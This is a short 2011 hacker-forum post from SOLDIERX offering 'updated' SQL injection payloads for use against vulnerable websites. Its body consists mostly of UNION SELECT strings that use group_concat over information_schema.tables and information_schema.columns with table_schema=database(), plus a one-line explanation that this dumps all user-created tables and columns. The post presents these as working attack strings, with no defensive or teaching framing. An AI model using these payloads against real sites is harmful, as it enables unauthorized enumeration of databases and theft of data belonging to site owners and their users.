Some Updated Queries For SQL Injection

5 replies [Last post]

1 March, 2011 - 20:54

alcohologist

Offline

SX Crew

Joined: 2010/11/22

I would just like to correct some queries for sql injection so that some would not have some problems in inserting queries to an sql vulnerable site.

PROBLEM

union select 1,2,group_concat(table_name),4,5 from information_schema.tables--

union select all 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

And so here is the latest update in order to fix the problem:

Updated

union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--

union select 1,2,group_concat(column_name),4,5 +from+information_schema.columns+where table_schema=database()--  

==================================
> table_schema is the database so when you type table_schema=database() it returns true and dumps all user created tables, which is also the same for columns

.(....\............../....)
. \....\........... /..../
...\....\........../..../
....\..../´¯.I.¯`\./
..../... I....I..(¯¯¯`\
...I.....I....I...¯¯.\...\
...I.....I´¯.I´¯.I..\...)
...\.....` ¯..¯ ´.......'
....\_________.·´

~o ~o ~o

SOLDIERX.COM Nobody Can Stop Information Insemination

User login

Navigation

Active forum topics

Who's online

Who's new

Some Updated Queries For SQL Injection